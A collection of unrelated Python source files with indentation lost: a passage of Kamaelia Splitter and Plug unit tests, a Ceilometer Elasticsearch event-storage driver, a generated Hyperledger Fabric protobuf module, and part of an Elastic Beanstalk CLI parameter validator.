self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.failUnless(self.dst2.dataReady("test"))
self.failUnless(self.dst2.recv("test") == i)
def __test_addOutboxes_createsink(self): # SMELL - internal diagnostic
"""createsink - Called repeatedly. Adds a whole set of sinks and checks
they all receive expected messages."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.split.createsink(c)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady())
self.failUnless(comp.recv() == i)
class PlugSplitter_Tests(unittest.TestCase):
def test_InstantiateNoArgs(self):
"""Splitter instantiated with no args is just passthrough"""
split = Splitter()
split.activate()
def test_PassThroughInboxOutbox(self):
"""Data sent to the inbox is sent on to the outbox"""
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for i in xrange(1,10):
split._deliver( i, "inbox" )
for _ in xrange(0,100):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
# self.assert_( i == split._collect("outbox") )
self.assert_( i == Dummy.recv("inbox") )
for i in xrange(1,10):
split._deliver( i, "inbox" )
split.next()
split.next()
for _ in xrange(0,10):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
# self.assert_( i == split._collect("outbox") )
self.assert_( i == Dummy.recv("inbox") )
def test_PassThroughControlSignal(self):
"""Data sent to the inbox is sent on to the outbox"""
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for i in xrange(1,10):
split._deliver( i, "control" )
for _ in xrange(0,100):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["signal"]))
self.assert_(0==len(split.outboxes["outbox"]))
# self.assert_( i == split._collect("signal") )
self.assert_( i == Dummy.recv("control") )
for i in xrange(1,10):
split._deliver( i, "control" )
split.next()
split.next()
for _ in xrange(0,10):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["signal"]))
self.assert_(0==len(split.outboxes["outbox"]))
# self.assert_( i == split._collect("signal") )
self.assert_( i == Dummy.recv("control") )
def test_SplitterShutdown(self):
"""If producerFinished or shutdownMicroprocess is received on the 'control' inbox they are passed on and the component shuts down"""
for msg in [producerFinished(self), shutdownMicroprocess(self)]:
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for _ in xrange(0,10):
split.next()
self.assert_(0==len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
split._deliver( msg, "control" )
try:
for _ in xrange(0,10):
split.next()
self.fail()
except StopIteration:
pass
self.assert_(0==len(split.outboxes["outbox"]))
self.assert_(1==len(split.outboxes["signal"]))
# received = split._collect("signal")
received = Dummy.recv("control")
self.assert_( msg == received )
def test_SplitterAddLinkBoth(self):
"""Sending an addSink message to splitter links in an extra outbox and signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox", "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
self.assert_(10+i == target2.recv("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterAddLinkOutboxOnly(self):
"""Sending an addSink message to splitter links in an extra outbox"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterAddLinkSignalOnly(self):
"""Sending an addSink message to splitter links in an extra signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, None, "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
for j in xrange(1,10):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(10+i == target2.recv("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterDelLinkBoth(self):
"""Sending an delSink message to splitter unlinks in the extra outbox and signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox", "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
if i == 5:
delmsg = removesink(target2, "inbox", "control")
split._deliver(delmsg, "configuration")
split._deliver(i, "inbox")
split._deliver(10+i, "control")
for j in xrange(1,10):
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,5):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
self.assert_(10+i == target2.recv("control"))
for i in xrange(5,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
class Plug_Tests(unittest.TestCase):
def test_PluggingInAndTxfer(self):
"""Plug instantiated with splitter and component and passes data through to component."""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
splitter = Splitter()
splitter.activate()
target = DummyComponent()
plug = Plug(splitter, target).activate()
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,1000):
execute.next()
#pass some data in
for i in xrange(1,10):
splitter._deliver(i, "inbox")
splitter._deliver(10+i, "control")
for i in xrange(1,100):
execute.next()
# verify it reached the target
self.assert_(target.inboxlog == range(1,10))
self.assert_(target.controllog == range(11,20))
def test_Unplugging(self):
"""Plug will unplug and shutdown when child component dies."""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
splitter = Splitter()
splitter.activate()
target = DummyComponent()
plug = Plug(splitter, target).activate()
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,100):
execute.next()
#send shutdown msg
msg = producerFinished()
target._deliver(msg, "control")
for i in xrange(1,100):
execute.next()
# verify it reached the target
self.assert_(target.controllog == [msg])
# verify the plug has shutdown
self.assert_(plug._isStopped())
# verify the plug has no linkages
self.assert_(not plug.postoffice.linkages)
# verify that splitter only has outboxes "outbox" and "signal" now
self.assert_( len(splitter.outboxes) == 2)
self.assert_( "outbox" in splitter.outboxes)
self.assert_( "signal" in splitter.outboxes)
if __name__=='__main__':
unittest.main()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import operator
import elasticsearch as es
from elasticsearch import helpers
from oslo_log import log
from oslo_utils import netutils
from oslo_utils import timeutils
import six
from ceilometer.event.storage import base
from ceilometer.event.storage import models
from ceilometer.i18n import _LE, _LI
from ceilometer import storage
from ceilometer import utils
LOG = log.getLogger(__name__)
AVAILABLE_CAPABILITIES = {
'events': {'query': {'simple': True}},
}
AVAILABLE_STORAGE_CAPABILITIES = {
'storage': {'production_ready': True},
}
class Connection(base.Connection):
"""Put the event data into an ElasticSearch db.
Events in ElasticSearch are indexed by day and stored by event_type.
An example document::
{"_index":"events_2014-10-21",
"_type":"event_type0",
"_id":"dc90e464-65ab-4a5d-bf66-ecb956b5d779",
"_score":1.0,
"_source":{"timestamp": "2014-10-21T20:02:09.274797"
"traits": {"id4_0": "2014-10-21T20:02:09.274797",
"id3_0": 0.7510790937279408,
"id2_0": 5,
"id1_0": "18c97ba1-3b74-441a-b948-a702a30cbce2"}
}
}
"""
CAPABILITIES = utils.update_nested(base.Connection.CAPABILITIES,
AVAILABLE_CAPABILITIES)
STORAGE_CAPABILITIES = utils.update_nested(
base.Connection.STORAGE_CAPABILITIES,
AVAILABLE_STORAGE_CAPABILITIES,
)
index_name = 'events'
# NOTE(gordc): mainly for testing, data is not searchable after write,
# it is only searchable after periodic refreshes.
_refresh_on_write = False
def __init__(self, url):
url_split = netutils.urlsplit(url)
self.conn = es.Elasticsearch(url_split.netloc)
def upgrade(self):
iclient = es.client.IndicesClient(self.conn)
ts_template = {
'template': '*',
'mappings': {'_default_':
{'_timestamp': {'enabled': True,
'store': True},
'properties': {'traits': {'type': 'nested'}}}}}
iclient.put_template(name='enable_timestamp', body=ts_template)
def record_events(self, events):
def _build_bulk_index(event_list):
for ev in event_list:
traits = {t.name: t.value for t in ev.traits}
yield {'_op_type': 'create',
'_index': '%s_%s' % (self.index_name,
ev.generated.date().isoformat()),
'_type': ev.event_type,
'_id': ev.message_id,
'_source': {'timestamp': ev.generated.isoformat(),
'traits': traits,
'raw': ev.raw}}
error = None
for ok, result in helpers.streaming_bulk(
self.conn, _build_bulk_index(events)):
if not ok:
__, result = result.popitem()
if result['status'] == 409:
LOG.info(_LI('Duplicate event detected, skipping it: %s')
% result)
else:
LOG.exception(_LE('Failed to record event: %s') % result)
error = storage.StorageUnknownWriteError(result)
if self._refresh_on_write:
self.conn.indices.refresh(index='%s_*' % self.index_name)
while self.conn.cluster.pending_tasks(local=True)['tasks']:
pass
if error:
raise error
def _make_dsl_from_filter(self, indices, ev_filter):
q_args = {}
filters = []
if ev_filter.start_timestamp:
filters.append({'range': {'timestamp':
{'ge': ev_filter.start_timestamp.isoformat()}}})
while indices[0] < (
'%s_%s' % (self.index_name,
ev_filter.start_timestamp.date().isoformat())):
del indices[0]
if ev_filter.end_timestamp:
filters.append({'range': {'timestamp':
{'le': ev_filter.end_timestamp.isoformat()}}})
while indices[-1] > (
'%s_%s' % (self.index_name,
ev_filter.end_timestamp.date().isoformat())):
del indices[-1]
q_args['index'] = indices
if ev_filter.event_type:
q_args['doc_type'] = ev_filter.event_type
if ev_filter.message_id:
filters.append({'term': {'_id': ev_filter.message_id}})
if ev_filter.traits_filter:
trait_filters = []
for t_filter in ev_filter.traits_filter:
value = None
for val_type in ['integer', 'string', 'float', 'datetime']:
if t_filter.get(val_type):
value = t_filter.get(val_type)
if isinstance(value, six.string_types):
value = value.lower()
elif isinstance(value, datetime.datetime):
value = value.isoformat()
break
if t_filter.get('op') in ['gt', 'ge', 'lt', 'le']:
op = (t_filter.get('op').replace('ge', 'gte')
.replace('le', 'lte'))
trait_filters.append(
{'range': {t_filter['key']: {op: value}}})
else:
tf = {"query": {"query_string": {
"query": "%s: \"%s\"" % (t_filter['key'], value)}}}
if t_filter.get('op') == 'ne':
tf = {"not": tf}
trait_filters.append(tf)
filters.append(
{'nested': {'path': 'traits', 'query': {'filtered': {
'filter': {'bool': {'must': trait_filters}}}}}})
q_args['body'] = {'query': {'filtered':
{'filter': {'bool': {'must': filters}}}}}
return q_args
def get_events(self, event_filter):
iclient = es.client.IndicesClient(self.conn)
indices = iclient.get_mapping('%s_*' % self.index_name).keys()
if indices:
filter_args = self._make_dsl_from_filter(indices, event_filter)
results = self.conn.search(fields=['_id', 'timestamp',
'_type', '_source'],
sort='timestamp:asc',
**filter_args)
trait_mappings = {}
for record in results['hits']['hits']:
trait_list = []
if not record['_type'] in trait_mappings:
trait_mappings[record['_type']] = list(
self.get_trait_types(record['_type']))
for key in record['_source']['traits'].keys():
value = record['_source']['traits'][key]
for t_map in trait_mappings[record['_type']]:
if t_map['name'] == key:
dtype = t_map['data_type']
break
else:
dtype = models.Trait.TEXT_TYPE
trait_list.append(models.Trait(
name=key, dtype=dtype,
value=models.Trait.convert_value(dtype, value)))
gen_ts = timeutils.normalize_time(timeutils.parse_isotime(
record['_source']['timestamp']))
yield models.Event(message_id=record['_id'],
event_type=record['_type'],
generated=gen_ts,
traits=sorted(
trait_list,
key=operator.attrgetter('dtype')),
raw=record['_source']['raw'])
def get_event_types(self):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = set()
for index in es_mappings.keys():
for ev_type in es_mappings[index]['mappings'].keys():
seen_types.add(ev_type)
# TODO(gordc): tests assume sorted ordering but backends are not
# explicitly ordered.
# NOTE: _default_ is a type that appears in all mappings but is not
# real 'type'
seen_types.discard('_default_')
return sorted(list(seen_types))
@staticmethod
def _remap_es_types(d_type):
if d_type == 'string':
d_type = 'text'
elif d_type == 'long':
d_type = 'int'
elif d_type == 'double':
d_type = 'float'
elif d_type == 'date' or d_type == 'date_time':
d_type = 'datetime'
return d_type
def get_trait_types(self, event_type):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = []
for index in es_mappings.keys():
# if event_type exists in index and has traits
if (es_mappings[index]['mappings'].get(event_type) and
es_mappings[index]['mappings'][event_type]['properties']
['traits'].get('properties')):
for t_type in (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties'].keys()):
d_type = (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties']
[t_type]['type'])
d_type = models.Trait.get_type_by_name(
self._remap_es_types(d_type))
if (t_type, d_type) not in seen_types:
yield {'name': t_type, 'data_type': d_type}
seen_types.append((t_type, d_type))
def get_traits(self, event_type, trait_type=None):
t_types = dict((res['name'], res['data_type'])
for res in self.get_trait_types(event_type))
if not t_types or (trait_type and trait_type not in t_types.keys()):
return
result = self.conn.search('%s_*' % self.index_name, event_type)
for ev in result['hits']['hits']:
if trait_type and ev['_source']['traits'].get(trait_type):
yield models.Trait(
name=trait_type,
dtype=t_types[trait_type],
value=models.Trait.convert_value(
t_types[trait_type],
ev['_source']['traits'][trait_type]))
else:
for trait in ev['_source']['traits'].keys():
yield models.Trait(
name=trait,
dtype=t_types[trait],
value=models.Trait.convert_value(
t_types[trait],
ev['_source']['traits'][trait]))
|
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: msp/msp_principal.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='msp/msp_principal.proto',
package='common',
syntax='proto3',
serialized_pb=_b('\n\x17msp/msp_principal.proto\x12\x06\x63ommon\"\xa9\x01\n\x0cMSPPrincipal\x12\x45\n\x18principal_classification\x18\x01 \x01(\x0e\x32#.common.MSPPrincipal.Classification\x12\x11\n\tprincipal\x18\x02 \x01(\x0c\"?\n\x0e\x43lassification\x12\x08\n\x04ROLE\x10\x00\x12\x15\n\x11ORGANIZATION_UNIT\x10\x01\x12\x0c\n\x08IDENTITY\x10\x02\"q\n\x10OrganizationUnit\x12\x16\n\x0emsp_identifier\x18\x01 \x01(\t\x12&\n\x1eorganizational_unit_identifier\x18\x02 \x01(\t\x12\x1d\n\x15\x63\x65rtifiers_identifier\x18\x03 \x01(\x0c\"r\n\x07MSPRole\x12\x16\n\x0emsp_identifier\x18\x01 \x01(\t\x12)\n\x04role\x18\x02 \x01(\x0e\x32\x1b.common.MSPRole.MSPRoleType\"$\n\x0bMSPRoleType\x12\n\n\x06MEMBER\x10\x00\x12\t\n\x05\x41\x44MIN\x10\x01\x42P\n$org.hyperledger.fabric.protos.commonZ(github.com/hyperledger/fabric/protos/mspb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_MSPPRINCIPAL_CLASSIFICATION = _descriptor.EnumDescriptor(
name='Classification',
full_name='common.MSPPrincipal.Classification',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ROLE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ORGANIZATION_UNIT', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IDENTITY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=142,
serialized_end=205,
)
_sym_db.RegisterEnumDescriptor(_MSPPRINCIPAL_CLASSIFICATION)
_MSPROLE_MSPROLETYPE = _descriptor.EnumDescriptor(
name='MSPRoleType',
full_name='common.MSPRole.MSPRoleType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MEMBER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ADMIN', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=400,
serialized_end=436,
)
_sym_db.RegisterEnumDescriptor(_MSPROLE_MSPROLETYPE)
_MSPPRINCIPAL = _descriptor.Descriptor(
name='MSPPrincipal',
full_name='common.MSPPrincipal',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='principal_classification', full_name='common.MSPPrincipal.principal_classification', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='principal', full_name='common.MSPPrincipal.principal', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MSPPRINCIPAL_CLASSIFICATION,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=36,
serialized_end=205,
)
_ORGANIZATIONUNIT = _descriptor.Descriptor(
name='OrganizationUnit',
full_name='common.OrganizationUnit',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='msp_identifier', full_name='common.OrganizationUnit.msp_identifier', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='organizational_unit_identifier', full_name='common.OrganizationUnit.organizational_unit_identifier', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='certifiers_identifier', full_name='common.OrganizationUnit.certifiers_identifier', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=207,
serialized_end=320,
)
_MSPROLE = _descriptor.Descriptor(
name='MSPRole',
full_name='common.MSPRole',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='msp_identifier', full_name='common.MSPRole.msp_identifier', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='role', full_name='common.MSPRole.role', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MSPROLE_MSPROLETYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=322,
serialized_end=436,
)
_MSPPRINCIPAL.fields_by_name['principal_classification'].enum_type = _MSPPRINCIPAL_CLASSIFICATION
_MSPPRINCIPAL_CLASSIFICATION.containing_type = _MSPPRINCIPAL
_MSPROLE.fields_by_name['role'].enum_type = _MSPROLE_MSPROLETYPE
_MSPROLE_MSPROLETYPE.containing_type = _MSPROLE
DESCRIPTOR.message_types_by_name['MSPPrincipal'] = _MSPPRINCIPAL
DESCRIPTOR.message_types_by_name['OrganizationUnit'] = _ORGANIZATIONUNIT
DESCRIPTOR.message_types_by_name['MSPRole'] = _MSPROLE
MSPPrincipal = _reflection.GeneratedProtocolMessageType('MSPPrincipal', (_message.Message,), dict(
DESCRIPTOR = _MSPPRINCIPAL,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.MSPPrincipal)
))
_sym_db.RegisterMessage(MSPPrincipal)
OrganizationUnit = _reflection.GeneratedProtocolMessageType('OrganizationUnit', (_message.Message,), dict(
DESCRIPTOR = _ORGANIZATIONUNIT,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.OrganizationUnit)
))
_sym_db.RegisterMessage(OrganizationUnit)
MSPRole = _reflection.GeneratedProtocolMessageType('MSPRole', (_message.Message,), dict(
DESCRIPTOR = _MSPROLE,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.MSPRole)
))
_sym_db.RegisterMessage(MSPRole)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n$org.hyperledger.fabric.protos.commonZ(github.com/hyperledger/fabric/protos/msp'))
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
|
|
#!/usr/bin/env python
#==============================================================================
# Copyright 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Amazon Software License (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is
# located at
#
# http://aws.amazon.com/asl/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or
# implied. See the License for the specific language governing permissions
# and limitations under the License.
#==============================================================================
import logging
import os
from scli.constants import EbLocalDir, OptionSettingFile, ParameterName, \
ParameterSource, ServiceRegion, ServiceDefault
from scli.resources import ValidationMessage
from scli.exception import ValidationError
log = logging.getLogger("cli")
class Parameter(object):
'''
Parameter store parameter value used by operations
'''
def __init__(self, name, value, source):
self._name = name
self._source = source
self._value = value
@property
def name(self):
return self._name
@property
def value(self):
return self._value
@property
def source(self):
return self._source
@name.setter
def name(self, name):
self._name = name
@value.setter
def value(self, value):
self._value = value
@source.setter
def source(self, source):
self._source = source
class ParameterPool(object):
'''
A collection of runtime parameters.
'''
def __init__(self):
self._pool = dict()
@property
def command(self): # one pool can have at most one command
return (self._pool[ParameterName.Command].value, self._pool[ParameterName.SubCommand].value)
@property
def parameter_names(self):
params = set()
for param_name in list(self._pool.keys()):
params.add(param_name)
return params
@property
def parameters(self):
return self._pool
def __getitem__(self, name):
return self._pool[name]
def get(self, name):
return self._pool[name]
def get_value(self, name, none_if_not_exist = True):
try:
return self._pool[name].value
except KeyError:
if none_if_not_exist:
return None
else:
raise
def get_source(self, name):
return self._pool[name].source
def put(self, param, force = False):
'''
Add new parameter to pool.
When new parameter is not presented in pool or force is set to True, new
parameter will be always added/updated to pool. Otherwise, it will be
only updated to pool when source of new parameter has higher or equal priority
than the one in pool.
'''
if not isinstance(param, Parameter):
raise AttributeError("Cannot add item that's not instance of Parameter.")
if param.name not in self._pool \
or force\
or param.source == self._pool[param.name].source \
or ParameterSource.is_ahead(param.source, self._pool[param.name].source):
self._pool[param.name] = param
def update(self, name, value = None, source = None):
if name in self._pool:
if value is not None:
self._pool[name].value = value
if source is not None:
self._pool[name].source = source
else:
self.put(Parameter(name, value, source))
def has(self, name):
return name in self._pool
def remove(self, name):
if self.has(name):
del self._pool[name]
def validate(self, source = None):
validator = ParameterValidator()
validator.validate(self)
class ParameterValidator(object):
_validators = dict()
def __init__(self):
self._validators[ParameterName.ApplicationName] = \
self.validate_application_name
self._validators[ParameterName.ApplicationVersionName] = \
self.validate_application_version_name
self._validators[ParameterName.EnvironmentName] = \
self.validate_environment_name
self._validators[ParameterName.SolutionStack] = self.validate_solution_stack
self._validators[ParameterName.ServiceEndpoint] = self.validate_endpoint
self._validators[ParameterName.Region] = self.validate_region
#-------------------------------
# Helper method
#-------------------------------
@classmethod
def validate_alphanumeric(cls, value, min_size = None, max_size = None):
if value is not None:
size = len(value)
if min_size is not None and size < min_size:
return False
elif max_size is not None and size > max_size:
return False
else:
return value.isalnum()
else:
return False
@classmethod
def validate_RDS_password(cls, value, min_size = None, max_size = None):
if value is not None:
size = len(value)
if min_size is not None and size < min_size:
return False
elif max_size is not None and size > max_size:
return False
else:
return not("/" in value or "\\" in value or "@" in value)
else:
return False
@classmethod
def _validate_string(cls, value, name):
if len(value) < 1:
raise ValidationError(ValidationMessage.EmptyString.format(name))
@classmethod
def _validate_integer(cls, param, max_value = None, min_value = None):
try:
value = int(param)
except ValueError:
raise ValidationError(ValidationMessage.InvalidNumber.format(param))
if max_value is not None and max_value < value:
raise ValidationError(ValidationMessage.NumberTooBig.format(value))
if min_value is not None and min_value > value:
raise ValidationError(ValidationMessage.NumberTooSmall.format(value))
#-------------------------------
# Validation method
#-------------------------------
@classmethod
def validate(self, parameter_pool, source = None):
''' Validate parameters in pool when their sources equal to specified source.
Where source is None, validate all. '''
for name, parameter in list(parameter_pool.parameters.items()):
if source is None or parameter.source == source:
try:
self._validators[name](parameter_pool, source)
except KeyError:
continue # skip if don't have validator
@classmethod
def validate_application_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ApplicationName):
name = parameter_pool.get_value(ParameterName.ApplicationName)
cls._validate_string(name, ParameterName.ApplicationName)
@classmethod
def validate_application_version_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ApplicationVersionName):
name = parameter_pool.get_value(ParameterName.ApplicationVersionName)
cls._validate_string(name, ParameterName.ApplicationVersionName)
@classmethod
def validate_environment_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.EnvironmentName):
name = parameter_pool.get_value(ParameterName.EnvironmentName)
cls._validate_string(name, ParameterName.EnvironmentName)
@classmethod
def validate_solution_stack(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.SolutionStack):
name = parameter_pool.get_value(ParameterName.SolutionStack)
cls._validate_string(name, ParameterName.SolutionStack)
@classmethod
def validate_region(cls, parameter_pool, source):
if (parameter_pool.has(ParameterName.Region)):
region = parameter_pool.get_value(ParameterName.Region)
if region not in ServiceRegion:
raise ValidationError(ValidationMessage.InvalidRegion.\
format(region))
@classmethod
def validate_endpoint(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ServiceEndpoint):
name = parameter_pool.get_value(ParameterName.ServiceEndpoint)
